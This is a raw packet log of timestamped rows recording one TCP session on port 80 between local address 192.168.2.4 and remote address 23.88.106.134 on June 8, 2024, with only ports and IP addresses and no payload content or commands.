Jun 8, 2024 20:22:07.144319057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.144319057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.144325972 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.144354105 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.144367933 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.144392014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.144402981 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.144422054 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.144454956 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.144459009 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.144514084 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.144536972 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.144593000 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.144593954 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.144628048 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.144644976 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.144659996 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.144695044 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.144700050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.144728899 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.144731045 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.144752026 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.144763947 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.144779921 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.144798040 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.144818068 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.144854069 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.144901991 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.144932032 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.144963026 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.144983053 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.144984007 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145035982 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.145041943 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145068884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.145095110 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145118952 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145123005 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.145157099 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.145179033 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145205021 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145210028 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.145243883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.145271063 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145278931 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.145296097 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145313978 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.145338058 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145370960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.145375013 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145421982 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.145426989 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145457029 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.145478010 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145508051 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.145513058 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145565033 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.145570993 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145615101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145616055 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.145654917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.145672083 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145689011 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.145710945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145723104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.145740032 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145756006 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.145776033 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145790100 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.145804882 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145842075 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.145843029 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145875931 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.145896912 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145909071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.145931005 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145955086 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.145960093 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146014929 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146038055 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.146048069 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146061897 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.146100044 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146105051 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.146152020 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146157980 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.146184921 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146207094 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.146234989 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.146239042 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146291018 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146296024 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.146342039 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146342039 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.146395922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146403074 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.146433115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146450996 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.146466970 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146486044 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.146501064 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146522045 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.146533966 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146559000 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.146569967 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146589041 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.146620989 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146625996 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.146655083 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146675110 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.146687984 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146713972 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.146723032 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146734953 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.146773100 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146775007 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.146827936 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.146830082 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146863937 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146884918 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.146898031 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146919012 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.146931887 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146955013 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.146966934 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.146984100 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147003889 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147022009 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147039890 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147058964 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147073030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147094965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147108078 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147124052 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147142887 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147161007 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147176981 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147201061 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147228956 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147231102 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147263050 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147283077 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147298098 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147315979 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147347927 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147370100 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147382021 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147408009 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147417068 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147430897 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147449970 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147469997 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147484064 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147509098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147516966 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147532940 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147552013 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147568941 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147586107 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147609949 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147622108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147634983 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147655964 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147675037 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147690058 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147710085 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147722960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147737980 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147758007 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147772074 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147792101 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147813082 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147826910 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147850037 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147860050 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147886992 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147895098 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147907972 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147929907 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147963047 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.147964954 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.147983074 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.148022890 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.152650118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.152679920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.152729988 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.152730942 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.152750015 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.152784109 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.152789116 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.152818918 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.152839899 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.152853012 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.152884007 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.152894020 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.152913094 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.152946949 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.153733015 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.153760910 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.153795004 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.153811932 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.153815985 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.153865099 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.153868914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.153898954 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.153918982 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.153951883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.153965950 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154006958 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.154009104 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154057980 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.154062986 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154110909 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.154118061 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154160023 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.154166937 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154196024 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.154225111 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154230118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.154262066 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154264927 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.154287100 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154319048 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.154320955 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154371023 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154373884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.154422045 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154427052 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.154476881 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154478073 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.154525995 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.154527903 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154565096 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.154573917 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154598951 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.154613972 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154633045 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.154649019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154665947 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.154681921 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154714108 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154717922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.154751062 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.154763937 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154788017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.154798985 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154836893 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154839993 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.154872894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.154886007 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154906988 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.154921055 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154941082 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.154954910 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154990911 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.154993057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155042887 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155045033 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155078888 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155093908 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155112982 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155127048 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155145884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155159950 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155194044 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155195951 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155245066 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155246019 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155291080 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155294895 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155329943 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155344009 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155364990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155379057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155397892 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155414104 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155432940 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155447006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155467033 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155482054 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155500889 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155517101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155534029 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155550003 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155567884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155582905 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155597925 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155618906 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155630112 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155647993 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155664921 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155678988 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155698061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155711889 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155731916 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155745983 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155765057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155781031 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155801058 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155814886 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155834913 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155848026 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155869007 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155883074 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155904055 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155920029 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155937910 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155951977 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.155972004 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.155986071 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.156059980 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.156075954 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.156095028 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.156109095 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.156128883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.156141996 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.156162977 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.156178951 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.156197071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.156212091 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.156230927 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.156244993 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.156265974 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.156280041 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.156301022 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.156315088 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.156335115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.156349897 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.156368971 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.156383991 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.156404018 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.156418085 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.156436920 CEST	80	49731	23.88.106.134	192.168.2.4
